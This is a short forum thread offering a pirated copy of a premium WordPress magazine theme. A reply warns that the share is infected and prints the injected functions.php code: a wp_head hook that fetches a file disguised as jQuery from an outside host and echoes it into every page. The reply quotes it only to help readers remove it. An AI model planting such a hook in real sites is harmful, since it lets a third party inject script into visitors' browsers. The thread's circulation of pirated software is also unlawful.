56.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

11-13-2012, 06:43 PM (This post was last modified: 11-13-2012 06:53 PM by magicmastermind.)
Post: #1
[GET] Headlines - WooThemes Premium Wordpress Theme
Headlines - WooThemes Premium Wordpress Theme

Headlines continues where our old magazine themes left off. It has tons
of requested features like featured area, social bookmarks, author
highlighting, flexible layout to name a few. It’s the perfect platform
to launch your magazine or blog and reach out to the world!

Demo:


Code:
woothemes.com/demo/headlines/


Download:
http://bestblackhatforum.com/Thread-GET-...#pid259070
11-13-2012, 07:29 PM
Post: #2
RE:
THE ABOVE SHARE IS INFECTED
It contains a wp_head injection
I am about to leave for a meeting, so have no time to clean and re-sahre right now.

please open functions.php and remove the following from the end of the code

Code:
<?php
function jqueryj_head() {

if(function_exists('curl_init'))
{
$url = "http://www.shigg.com/soft/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 10;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
}
add_action('wp_head', 'jqueryj_head');
?>

I will check this users other shares when I return tonight.

Cheers,
Si
05-21-2014, 01:22 PM
Post: #3
RE:
do we have a clean version of this?




38.gif